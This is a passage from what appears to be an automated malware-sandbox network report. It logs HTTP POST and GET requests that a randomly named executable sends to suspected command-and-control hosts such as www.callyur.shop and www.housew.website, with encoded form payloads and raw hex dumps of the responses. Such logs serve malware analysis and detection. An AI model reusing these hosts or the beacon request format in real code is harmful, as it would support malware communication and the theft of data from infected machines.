                                                                                  Data Ascii: GTZ2Zl#l3z~ ec4KxSzkA_+CYS#]R)+ ;$3Z3q-4j<ybh("0=ai-C]":dnUvMmn5f<oW7A '@ZU"kIQXV;;,K|,wCUO
                                                                                  Nov 20, 2024 08:33:26.642863989 CET848INData Raw: 3d de 46 94 45 a2 d1 99 f4 b8 6c 28 9b 48 41 a9 86 4e ce 55 6e 0b 72 5f 44 99 a6 97 6a 4a b8 e3 78 41 61 18 cb 4e bb 3c 10 39 45 49 83 9d 3d d9 45 9a 5c 0b 01 ce b4 e4 6c 57 b9 2e b3 19 ef 0f 3e dc d6 26 69 f0 31 be 6b 58 5d 39 c1 36 4c 35 0e 01
                                                                                  Data Ascii: =FEl(HANUnr_DjJxAaN<9EI=E\lW.>&i1kX]96L52:/i+OO&>m\> @Ow~}YiCGGxy7_E;=G'lvlU?Au}x>~Nw^x|v


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.65001566.29.137.10803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:28.617840052 CET834OUTPOST /hayl/ HTTP/1.1
                                                                                  Host: www.callyur.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.callyur.shop
                                                                                  Referer: http://www.callyur.shop/hayl/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 32 73 6f 56 59 2f 42 43 4b 77 52 78 6f 61 68 37 6c 68 5a 66 65 53 38 55 64 42 31 6b 44 42 44 39 56 65 31 72 54 58 44 56 52 34 46 78 73 34 5a 72 6c 49 47 4b 54 37 43 43 55 59 2f 77 33 6a 42 45 35 30 46 46 6d 61 6a 33 6c 77 31 48 78 55 67 70 2b 69 6f 74 66 54 42 75 79 5a 61 67 69 62 4f 58 41 71 43 49 67 61 46 65 31 65 61 76 33 47 35 41 71 45 56 63 33 45 36 66 6e 53 41 62 69 52 79 4f 45 62 6a 63 75 50 49 58 47 5a 32 6a 72 57 73 2f 67 71 4b 76 36 6a 63 33 4f 5a 64 4c 55 6f 2f 51 52 76 30 42 45 6a 38 61 2b 71 34 4a 57 34 78 62 52 39 74 5a 49 71 45 75 2b 4a 55 75 62 64 30 67 4d 59 63 4e 36 34 54 75 74 44 4b 41 79 79 4c 55 33 65 56 63 59 62 6e 68 42 49 72 53 68 42 68 63 50 51 3d 3d
                                                                                  Data Ascii: GR54yHZ8=2soVY/BCKwRxoah7lhZfeS8UdB1kDBD9Ve1rTXDVR4Fxs4ZrlIGKT7CCUY/w3jBE50FFmaj3lw1HxUgp+iotfTBuyZagibOXAqCIgaFe1eav3G5AqEVc3E6fnSAbiRyOEbjcuPIXGZ2jrWs/gqKv6jc3OZdLUo/QRv0BEj8a+q4JW4xbR9tZIqEu+JUubd0gMYcN64TutDKAyyLU3eVcYbnhBIrShBhcPQ==
                                                                                  Nov 20, 2024 08:33:29.217259884 CET1236INHTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: gzip
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 20 Nov 2024 07:33:29 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 31 33 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5a 7a ff ef 53 10 a7 92 cc 94 da ad 15 90 3c 76 cf 68 43 12 20 21 09 04 88 54 ea 96 d0 8e 56 b4 c3 54 1e 28 af 91 27 cb 11 b6 db 98 b6 6f f7 a4 f2 23 a7 7f 18 9d e5 db 97 d3 df 77 7e fb ed b7 c7 7f e2 16 ec ca 54 f9 41 50 25 f1 b7 df 1e 9f ff 0c c0 78 0c 5c cb f9 f6 db e5 67 e2 56 16 d8 51 e5 f7 ee b1 0e 9b a7 3b 36 4b 2b 37 ad ee ab 53 ee de 0d ec e7 af a7 bb ca ed 2a b8 07 f1 97 81 1d 58 45 e9 56 4f 75 e5 dd 93 77 9f c2 b1 ec c0 bd ef cf 17 59 7c 05 28 cd ee ed 7e e9 d3 83 6a 61 f9 89 f5 8f 9c e0 bb 3c 2c dc f2 ea 08 f2 0e 7a 6a 25 ee d3 5d 13 ba 6d 9e 15 d5 d5 b6 36 74 aa e0 c9 71 9b d0 76 ef 2f 1f 5f 06 61 1a 56 a1 15 df 97 b6 15 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c 94 ac 1a 4c b2 3a 75 1e e1 e7 c9 67 51 96 d5 29 76 07 bd dc 5e c4 65 97 e5 0b 1d bd a8 f7 99 73 1a fc fd b2 b5 ff ec 87 07 a4 73 ef 59 49 18 9f 1e 06 74 01 d0 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 3c 56 86 67 f7 61 80 12 79 f7 7e 31 0e 53 f7 [TRUNCATED]
                                                                                  Data Ascii: 1348:rZzS<vhC !TVT('o#w~TAP%x\gVQ;6K+7S*XEVOuwY|(~ja<,zj%]m6tqv/_aVOoBL:ugQ)v^essYIt~nUh[_[_~<Vgay~1S>pC?W#cEPQ.5lc8~-'L|b~]YUnq#',$r#{Y._EYZae77Whqo_YC?:]V{LW]djW|,u"!-q]Ykt7p=W;_bNmkx["~}XIy%a~p0}seqYUel/+[BGWxV{Da) kev]~l8z+="WD|nq#EF7=-L/1euI+ 2x#W+u7y]qh81\4ml[z7/FK90[5~g{9r@K~gE/k.AHrT~+q@&[]&N>8&r!<.#m\u~^O
                                                                                  Nov 20, 2024 08:33:29.217322111 CET1236INData Raw: df d4 f0 46 cf df 12 d7 09 ad c1 9f 12 10 48 5f 14 33 1e 91 79 f7 e7 1b 34 b7 56 7b b3 dc 0b 2f cf ca 4b 86 7a 18 14 6e 0c 62 5d 73 e3 80 fd 9e 3e 62 01 ff 69 1f 06 41 e8 38 6e fa 46 52 bf da 8f ab fc 74 b1 ec 67 bf 7e bf ef 8d fc fe c4 2d 69 1f
                                                                                  Data Ascii: FH_3y4V{/Kznb]s>biA8nFRtg~-if~w1@D.E=)QW@{zk~ \A;'T<P,U.eU}#?=2G?f=?p}us\G^YBn
                                                                                  Nov 20, 2024 08:33:29.217359066 CET1236INData Raw: 89 53 73 58 32 db 70 d1 e9 a2 ef f2 33 3b d9 cb 12 65 db a2 ce 3a 9d e1 9a 56 3a c9 b5 a9 cc 18 9c 34 e9 5a d4 0e a6 21 43 67 49 74 c6 3b 02 8f a1 b4 de 08 c9 26 88 b4 12 b1 46 e6 d8 14 d7 ee 78 8c 25 68 b5 8b 0d 86 0f 66 12 15 8d d2 7a ce 93 fb
                                                                                  Data Ascii: SsX2p3;e:V:4Z!CgIt;&Fx%hfzlY^tTqf76@gk&h`9q;wCkA:4C}3-FID3Bm}C4j"(K)'taBSbcm}tX6oEIb-RmO
                                                                                  Nov 20, 2024 08:33:29.217391968 CET1236INData Raw: 00 4e ad 32 4d 7b 3e 2e e2 7a d5 04 1c b3 66 30 8b 90 4e 1d 4c 18 dd bc e8 48 3f 3b d9 1b c4 e0 fd 05 71 c2 e6 b8 08 19 f1 70 2b c1 44 93 d9 a3 62 17 d1 38 93 37 78 7a f0 96 70 1a e8 63 12 05 a1 59 19 55 c4 c2 dd 74 5a 57 47 a9 5f 4f d1 25 49 d0
                                                                                  Data Ascii: N2M{>.zf0NLH?;qp+Db87xzpcYUtZWG_O%IN-}R=c^Dfi~vc6gE7#[[tpPJ`fx{Bf!<mx8,~D2twhpS8&K/:< A4r\& j~HuN[u
                                                                                  Nov 20, 2024 08:33:29.217482090 CET284INData Raw: 03 f8 27 e0 af 98 ba ae 29 7f c2 cb 35 f9 b7 96 fa 99 39 fd e9 c5 9e fe fc a9 10 2e 7c be 57 e1 35 a2 e7 e5 3f 12 14 90 e2 3b de 9f 25 74 f7 ed 11 fe ec d4 23 fc 91 56 6e ec e8 03 ba ae 22 c1 2b 89 8f cf 1d bc f7 72 fe 65 a3 7a f5 ed fe e1 d6 03
                                                                                  Data Ascii: ')59.|W5?;%t#Vn"+rezdhn;3J~/6H[au&.3}Ot<i%O $\*<{PSH`y~~l>?ZzfeE~o((>PG


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.65001666.29.137.10803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:31.169580936 CET1847OUTPOST /hayl/ HTTP/1.1
                                                                                  Host: www.callyur.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.callyur.shop
                                                                                  Referer: http://www.callyur.shop/hayl/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 32 73 6f 56 59 2f 42 43 4b 77 52 78 6f 61 68 37 6c 68 5a 66 65 53 38 55 64 42 31 6b 44 42 44 39 56 65 31 72 54 58 44 56 52 34 4e 78 74 4c 52 72 6b 70 47 4b 43 4c 43 43 64 34 2f 4c 33 6a 42 5a 35 30 39 4a 6d 64 72 34 6c 32 35 48 72 31 41 70 32 77 51 74 4d 7a 42 75 74 4a 61 68 38 72 4f 34 41 71 53 4d 67 62 31 65 31 65 61 76 33 48 4a 41 6f 56 56 63 31 45 36 51 77 69 41 66 70 78 79 6d 45 62 36 6e 75 50 39 69 46 74 36 6a 73 31 45 2f 37 2f 57 76 78 6a 63 31 4e 5a 63 4d 55 6f 79 51 52 76 34 72 45 69 49 77 2b 71 4d 4a 58 39 52 46 4e 4a 5a 47 63 5a 6f 78 6c 37 77 59 63 34 55 4e 55 4a 55 30 79 72 61 54 71 58 47 30 38 6c 4c 2f 36 4d 64 5a 52 71 6a 50 66 39 43 39 6c 41 56 59 54 5a 6c 33 61 53 49 55 72 32 38 44 4f 49 48 75 7a 6b 5a 32 73 65 67 6d 7a 70 62 6a 75 51 6a 44 73 65 34 36 6e 74 49 33 78 61 46 66 6b 79 4f 72 6c 32 58 65 2b 64 75 71 76 4c 63 61 32 6b 54 4a 4f 74 58 41 54 5a 34 47 42 67 59 77 42 49 42 7a 48 39 61 48 50 4b 49 79 44 50 33 4f 73 62 76 2b 52 37 61 44 71 49 39 6e 31 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=2soVY/BCKwRxoah7lhZfeS8UdB1kDBD9Ve1rTXDVR4NxtLRrkpGKCLCCd4/L3jBZ509Jmdr4l25Hr1Ap2wQtMzButJah8rO4AqSMgb1e1eav3HJAoVVc1E6QwiAfpxymEb6nuP9iFt6js1E/7/Wvxjc1NZcMUoyQRv4rEiIw+qMJX9RFNJZGcZoxl7wYc4UNUJU0yraTqXG08lL/6MdZRqjPf9C9lAVYTZl3aSIUr28DOIHuzkZ2segmzpbjuQjDse46ntI3xaFfkyOrl2Xe+duqvLca2kTJOtXATZ4GBgYwBIBzH9aHPKIyDP3Osbv+R7aDqI9n1kEf2X9sMs7CYYeM5NFrilRxYcDNtmccZgedGZdwlDD+z5Esu/0xlqffeJr2dVhvd5Fem0kXCGAaJhaWLB6JftVizg/Y4te9fsbvxPPkglRZCgWLCaSWm9vEweLBS1Ho1XQLRWHuXBcTJC3IUONUC93jYWZdHdleDS1aQTTTRX+2ynvbrIcXlfHZDtixFpWH4JHaFrqsBK566Qw69ClDjfyc6QepCzOcqv416x+sf+kaikJw8zfW+so57iSQS9Dt1liAyKbYIn212/yRFHOfXImjIC5YYYIZKq6Gs+4sU9pVscbgY9dbi55ZBs13tO7ijF0lLsw+LGJkU2Mv0obGtfmtQ9vO/YNRxR3yQ8xoua95Yy23MkeHvm9sfO8TVZzexGIoOynWW7wiTYHW8P6jlR2HRTG1fmC8pkB1LaYfa/z6HTMlOtZiz6ILSdMtcBF0lPjcCkkPEzpPxd//2CgF09Nv//LfTqCTWp2wNCrui3jqG37OT7ezB4zKSZUjaBglyuoz/qUDnFRS4e9Du3xgQ/Q1q/NzsDDo/Nk1Pl8UqbwYVvMX+KN0qVzsvfJTp1WE2AtUlgEAu4NYD5N7hXvfc2Q9qbs86PmKrGuEo9zAHDkXrocwlVI0B9de7QVjAlLoNTec+NmzbSP+LOLEY7ql6XKbrPDj1iygOeH [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:31.752266884 CET1236INHTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: gzip
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 20 Nov 2024 07:33:31 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 31 33 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5a 7a ff ef 53 10 a7 92 cc 94 da ad 15 10 1e bb 67 b4 21 09 90 90 04 02 44 2a 75 4b bb 84 56 b4 c3 54 1e 28 af 91 27 cb 11 b6 db 98 b6 6f f7 a4 f2 23 a7 7f 18 9d e5 db 97 d3 df 77 7e fb ed b7 c7 7f 62 97 cc da 50 b8 41 50 25 f1 b7 df 1e 9f ff 0c c0 78 0c 5c d3 f9 f6 db e5 67 e2 56 26 d8 51 e5 f7 ee b1 0e 9b a7 3b 26 4b 2b 37 ad ee ab 53 ee de 0d ec e7 af a7 bb ca ed 2a b8 07 f1 97 81 1d 98 45 e9 56 4f 75 e5 dd 93 77 9f c2 31 ed c0 bd ef cf 17 59 7c 05 28 cd ee ed 7e e9 d3 83 4a 61 fa 89 f9 8f 9c e0 ba 3c 2c dc f2 ea 08 f2 0e 7a 6a 26 ee d3 5d 13 ba 6d 9e 15 d5 d5 b6 36 74 aa e0 c9 71 9b d0 76 ef 2f 1f 5f 06 61 1a 56 a1 19 df 97 b6 19 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c e4 ac 1a 4c b3 3a 75 1e e1 e7 c9 67 51 96 d5 29 76 07 bd dc 5e c4 65 97 e5 0b 1d bd a8 ad cc 39 0d fe 7e d9 da 7f f6 c3 03 d2 b9 f7 cc 24 8c 4f 0f 03 aa 00 68 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 1e 2b c3 b3 fb 30 40 89 bc 7b bf 18 87 a9 7b [TRUNCATED]
                                                                                  Data Ascii: 1348:rZzSg!D*uKVT('o#w~bPAP%x\gV&Q;&K+7S*EVOuw1Y|(~Ja<,zj&]m6tqv/_aVOoBL:ugQ)v^e9~$Oh7n*/L-B/?+0@{{T`+1J`,(?{~61yf>1?LMwK,X*ylYXqfGgbz&>v= %^g)E5W`y}zre.2qyVANYf$?Se/5q+e|HooKa@\WZk0\OWe]qyKS>0`G?Rqaxc-+I+^kgaB[A=WxD3WC5nqe_x2.?_6Ain=WD|nq#EF7=-L/1euI+ 2x#W+u7y]qh81\4ml[z7/FK901[5~g{9r@K~y5?67=_$u` +%nC$y}VC625?- :3>4D%~)
                                                                                  Nov 20, 2024 08:33:31.752319098 CET1236INData Raw: 9b 1a de e8 f9 5b e2 3a a1 39 f8 53 02 02 e9 8b 62 c6 23 32 ef fe 7c 83 e6 d6 6a 6f 96 7b e1 e5 59 79 c9 50 0f 83 c2 8d 41 ac 6b 6e 1c b0 df d3 47 2c e0 3f ed c3 20 08 1d c7 4d df 48 ea 57 fb 71 95 9f 2e 96 fd ec d7 ef f7 bd 91 df 9f b8 25 ed c3
                                                                                  Data Ascii: [:9Sb#2|jo{YyPAknG,? MHWq.%,o?FH"{/j_vGI?)':KCKY~Ui0,fHb5*M~k\Ufq]}\/W{z
                                                                                  Nov 20, 2024 08:33:31.752335072 CET1236INData Raw: 7c b2 80 45 a3 0d 97 9d 26 f8 2e 37 b7 13 4b 12 27 b6 2d 68 8c d3 e9 ae 61 a6 d3 5c 9d 49 b4 ce 8a d3 ae 45 ed 60 16 d2 54 96 44 67 bc 23 f0 18 4a eb 2d 9f 6c 83 48 2d 11 73 64 8c 0d 61 e3 8e c7 58 82 56 fb 58 a7 b9 60 2e 4e a2 51 5a 2f 38 d2 3a
                                                                                  Data Ascii: |E&.7K'-ha\IE`TDg#J-lH-sdaXVX`.NQZ/8:7+NekvLm>CU>GpN+MNg\`5~[Jy<e6epZ%2]NELjnC(+/WbNhCKqHPvlDQHR
                                                                                  Nov 20, 2024 08:33:31.752351046 CET672INData Raw: 70 6a 85 6e da f3 71 19 d7 eb 26 60 e9 0d 8d 99 84 78 ea 60 42 ef 16 45 47 fa d9 c9 de 22 3a e7 2f 89 13 b6 c0 05 48 8f 87 3b 11 26 9a cc 1e 15 fb 88 c2 e9 bc c1 d3 83 b7 82 d3 40 1b 93 28 08 cd f2 a8 22 96 ee b6 53 bb 3a 4a fd 7a 86 ae 48 82 d2
                                                                                  Data Ascii: pjnq&`x`BEG":/H;&@("S:JzH4Bkctj-L)4e9LDNA9+ligH]{E\0[ 7qLlMBP4ywL>\y9M^2(lxUGTZ2Zl
                                                                                  Nov 20, 2024 08:33:31.752413034 CET848INData Raw: 3d de 46 94 45 a2 d1 99 f4 b8 6c 28 9b 48 41 a9 86 4e ce 55 6e 0b 72 5f 44 99 a6 97 6a 4a b8 e3 78 41 61 18 cb 4e bb 3c 10 39 45 49 83 9d 3d d9 45 9a 5c 0b 01 ce b4 e4 6c 57 b9 2e b3 19 ef 0f 3e dc d6 26 69 f0 31 be 6b 58 5d 39 c1 36 4c 35 0e 01
                                                                                  Data Ascii: =FEl(HANUnr_DjJxAaN<9EI=E\lW.>&i1kX]96L52:/i+OO&>m\> @Ow~}YiCGGxy7_E;=G'lvlU?Au}x>~Nw^x|v


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.65001766.29.137.10803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:33.711628914 CET554OUTGET /hayl/?GR54yHZ8=7uA1bLkCaR9ampYb6jJSXGsXTCFtFEKjMbBrHkb2OaN+7KcXsqyJMoKLTM78+R5XhUdg+bLytXUVrFAv0hUdKTwX6reWgqWzJPe83oti/Pnp22FBmmdcqVWV2wV/tDaQIoOgzZo=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.callyur.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:33:34.314476013 CET1236INHTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  date: Wed, 20 Nov 2024 07:33:34 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 32 37 37 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                  Data Ascii: 2775<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:34.314532995 CET1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                                  Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                                  Nov 20, 2024 08:33:34.314567089 CET1236INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                                  Nov 20, 2024 08:33:34.314598083 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
                                                                                  Nov 20, 2024 08:33:34.314630985 CET1236INData Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34
                                                                                  Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
                                                                                  Nov 20, 2024 08:33:34.314661980 CET1236INData Raw: 70 34 56 46 69 4c 38 57 4d 2f 43 6c 38 53 46 34 70 67 74 68 76 74 48 6d 34 71 51 55 49 69 51 64 59 2b 35 4e 4d 66 75 2f 32 32 38 50 6b 71 33 4e 5a 4e 4d 71 44 31 57 37 72 4d 6e 72 77 4a 65 51 45 6d 49 77 4b 73 61 63 4d 49 2f 54 56 4f 4c 6c 48 6a
                                                                                  Data Ascii: p4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFtt
                                                                                  Nov 20, 2024 08:33:34.314698935 CET1236INData Raw: 57 78 51 78 75 6b 6e 67 75 4a 31 53 38 34 41 52 52 34 52 77 41 71 74 6d 61 43 46 5a 6e 52 69 4c 32 6c 62 4d 2b 48 61 41 43 35 6e 70 71 2b 49 77 46 2b 36 68 68 66 42 57 7a 4e 4e 6c 57 36 71 43 72 47 58 52 79 7a 61 30 79 4e 4f 64 31 45 31 66 73 59
                                                                                  Data Ascii: WxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8
                                                                                  Nov 20, 2024 08:33:34.314790010 CET1236INData Raw: 6f 6e 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20
                                                                                  Data Ascii: on class="response-info"> <span class="status-code">404</span> <span class="status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this
                                                                                  Nov 20, 2024 08:33:34.314826012 CET443INData Raw: 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 70 61 6e 65 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d
                                                                                  Data Ascii: ="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.650018203.161.46.205803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:39.395322084 CET816OUTPOST /4pih/ HTTP/1.1
                                                                                  Host: www.housew.website
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.housew.website
                                                                                  Referer: http://www.housew.website/4pih/
